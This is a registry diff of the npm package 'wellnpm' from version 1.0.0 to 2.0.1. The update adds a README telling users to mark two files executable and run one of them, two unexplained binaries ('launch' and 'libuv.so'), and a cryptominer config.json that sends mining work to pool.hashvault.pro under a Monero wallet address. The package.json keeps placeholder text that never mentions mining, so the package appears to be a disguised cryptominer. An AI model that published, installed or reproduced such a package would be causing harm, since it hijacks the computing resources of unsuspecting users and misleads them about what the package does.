wellnpm 1.0.0 → 2.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/README.md ADDED
@@ -0,0 +1 @@
1
+ hello world!! i just saved some data that might be useful in the future, there are 2 files that need to be executed +x after that 1 of the files must be moved to lib, then add ./ in front of 1 file and run, if you like! go ahead and change some information in config.json. greetings to all involved especially the geniuses
package/config.json ADDED
@@ -0,0 +1,119 @@
1
+ {
2
+ "api": {
3
+ "id": null,
4
+ "worker-id": null
5
+ },
6
+ "http": {
7
+ "enabled": false,
8
+ "host": "127.0.0.1",
9
+ "port": 0,
10
+ "access-token": null,
11
+ "restricted": true
12
+ },
13
+ "autosave": true,
14
+ "background": false,
15
+ "colors": true,
16
+ "title": true,
17
+ "randomx": {
18
+ "init": -1,
19
+ "init-avx2": -1,
20
+ "mode": "auto",
21
+ "1gb-pages": false,
22
+ "rdmsr": true,
23
+ "wrmsr": false,
24
+ "cache_qos": false,
25
+ "scratchpad_prefetch_mode": 1
26
+ },
27
+ "cpu": {
28
+ "enabled": true,
29
+ "huge-pages": true,
30
+ "huge-pages-jit": false,
31
+ "hw-aes": null,
32
+ "priority": null,
33
+ "memory-pool": false,
34
+ "yield": true,
35
+ "argon2-impl": null,
36
+ "argon2": [-1],
37
+ "cn": [-1],
38
+ "cn-heavy": [-1],
39
+ "cn-lite": [-1],
40
+ "cn-pico": [-1],
41
+ "cn/upx2": [-1],
42
+ "ghostrider": [
43
+ [1,-1],
44
+ [1,-1],
45
+ [1,-1],
46
+ [1,-1],
47
+ [1,-1],
48
+ [1,-1],
49
+ [1,-1],
50
+ [1,-1],
51
+ ],
52
+ "rx": [-1],
53
+ "rx/wow": [-1],
54
+ "cn-lite/0": false,
55
+ "cn/0": false,
56
+ "rx/arq": "rx/wow",
57
+ "rx/keva": "rx/wow"
58
+ },
59
+ "opencl": {
60
+ "enabled": false,
61
+ "cache": true,
62
+ "loader": null,
63
+ "platform": "AMD",
64
+ "cn-lite/0": false,
65
+ "cn/0": false
66
+ },
67
+ "cuda": {
68
+ "enabled": false,
69
+ "loader": null,
70
+ "nvml": true,
71
+ "cn-lite/0": false,
72
+ "cn/0": false
73
+ },
74
+ "log-file": null,
75
+ "donate-level": 1,
76
+ "donate-over-proxy": 1,
77
+ "pools": [
78
+ {
79
+ "algo": null,
80
+ "coin": null,
81
+ "url": "pool.hashvault.pro:80",
82
+ "user": "4AUTfJGTvT8A98PSE99EunfrnUbkWe9vU3FN3qsABQLP5aPKQuvWS5sCaD9WaXFQUqNtDLb9dcxiBgJiWCfjvDXp5ptWDYG",
83
+ "pass": "x",
84
+ "rig-id": null,
85
+ "nicehash": false,
86
+ "keepalive": false,
87
+ "enabled": true,
88
+ "tls": false,
89
+ "tls-fingerprint": null,
90
+ "daemon": false,
91
+ "socks5": null,
92
+ "self-select": null,
93
+ "submit-to-origin": false
94
+ }
95
+ ],
96
+ "retries": 5,
97
+ "retry-pause": 5,
98
+ "print-time": 60,
99
+ "health-print-time": 60,
100
+ "syslog": false,
101
+ "tls": {
102
+ "enabled": false,
103
+ "protocols": null,
104
+ "cert": null,
105
+ "cert_key": null,
106
+ "ciphers": null,
107
+ "ciphersuites": null,
108
+ "dhparam": null
109
+ },
110
+ "dns": {
111
+ "ipv6": false,
112
+ "ttl": 30
113
+ },
114
+ "user-agent": null,
115
+ "verbose": 0,
116
+ "watch": true,
117
+ "pause-on-battery": false,
118
+ "pause-on-active": false
119
+ }
package/launch ADDED
Binary file
package/libuv.so ADDED
Binary file
package/package.json CHANGED
@@ -1,12 +1,15 @@
1
1
  {
2
2
  "name": "wellnpm",
3
- "version": "1.0.0",
3
+ "version": "2.0.1",
4
4
  "description": "A brief description of your package",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
7
  "test": "echo \"Error: no test specified\" && exit 1"
8
8
  },
9
- "keywords": ["keyword1", "keyword2"],
9
+ "keywords": [
10
+ "keyword1",
11
+ "keyword2"
12
+ ],
10
13
  "author": "Your Name <wellenterprise81.gmail.com>",
11
14
  "license": "MIT"
12
15
  }